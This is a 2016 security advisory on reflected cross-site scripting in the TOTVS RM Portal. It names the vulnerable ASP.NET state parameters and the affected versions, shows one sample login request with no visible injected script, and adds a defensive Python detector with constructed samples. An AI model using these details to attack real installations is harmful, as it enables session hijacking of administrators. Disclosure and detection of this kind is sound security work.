TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities

Product web page: www.totvs.com.br
Author: vesp3r
Email: vesp3r7c3@gmail.com
Published: 13/02/2016

[Vendor Product Description]

TOTVS (pronounced Totus) is a Brazilian software company with headquarters in Sao Paulo. TOTVS was initially formed from the merger of the companies Microsiga and Logocenter. It is the largest software company in Latin America. TOTVS is the leader in the Brazilian ERP market according to the FGV and, besides Brazil, has offices in Argentina, Mexico and the United States.

[Advisory Timeline]

1- 22/Dec/2015 (No vendor response)
2- 05/Feb/2016 (No vendor response)

Tested on:

11.40.80.x
11.52.50.x
11.52.63.x
11.52.64.x
11.82.41.1
11.82.37.0
11.82.41.112
11.82.42.1
12.1.6.108
12.1.6.117
12.1.7.100
12.1.7.110
12.1.7.120
12.1.8.0
12.1.8.1

[Vulnerability Details]

An attacker can exploit reflected XSS through the unprotected __VIEWSTATE and __EVENTVALIDATION parameters, which are passed to various scripts. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary JavaScript code in the administrator's browser in the context of the vulnerable website.

1) Reflected Cross-site Scripting - Login.aspx

Parameter: __VIEWSTATE

POST /corpore.net/Login.aspx HTTP/1.1
[Snip...]
Content-Length:599
Expect:100-continue
Connection:Keep-Alive

__VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92
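
Added example (not part of the original advisory and not TOTVS code): a defensive Python check for request logs or a filtering proxy that flags a form body whose __VIEWSTATE or __EVENTVALIDATION value is not plain base64 after URL-decoding, since legitimate ASP.NET state fields carry only base64 text. The function names and both sample bodies are constructed for illustration.

```python
import base64
import binascii
from urllib.parse import parse_qsl

# ASP.NET state fields named in the advisory; a legitimate value is base64 only.
STATE_FIELDS = ("__VIEWSTATE", "__EVENTVALIDATION")


def is_strict_base64(value: str) -> bool:
    """True when value is empty or decodes as base64 with no stray characters."""
    try:
        base64.b64decode(value, validate=True)
        return True
    except (binascii.Error, ValueError):
        # binascii.Error: characters outside the alphabet or bad padding.
        # ValueError: non-ASCII input.
        return False


def suspicious_state_fields(body: str) -> list:
    """Return the state-field names in a urlencoded body that are not base64."""
    flagged = []
    # parse_qsl percent-decodes names and values. A raw '+' becomes a space,
    # so a client that fails to send '+' as %2B will also be flagged.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in STATE_FIELDS and not is_strict_base64(value):
            flagged.append(name)
    return flagged


# Constructed sample bodies (not taken from the advisory).
BENIGN = "__VIEWSTATE=%2FwEPDwUKMTIzNDU2Nzg5MGRk&__EVENTVALIDATION=%2FwEWAgKc&txtUser=a"
# Same request with inert markup appended to the state value.
TAMPERED = ("__VIEWSTATE=%2FwEPDwUK%22%3E%3Cb%3Econstructed%3C%2Fb%3E"
            "&__EVENTVALIDATION=%2FwEWAgKc&txtUser=a")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, suspicious_state_fields(body))
```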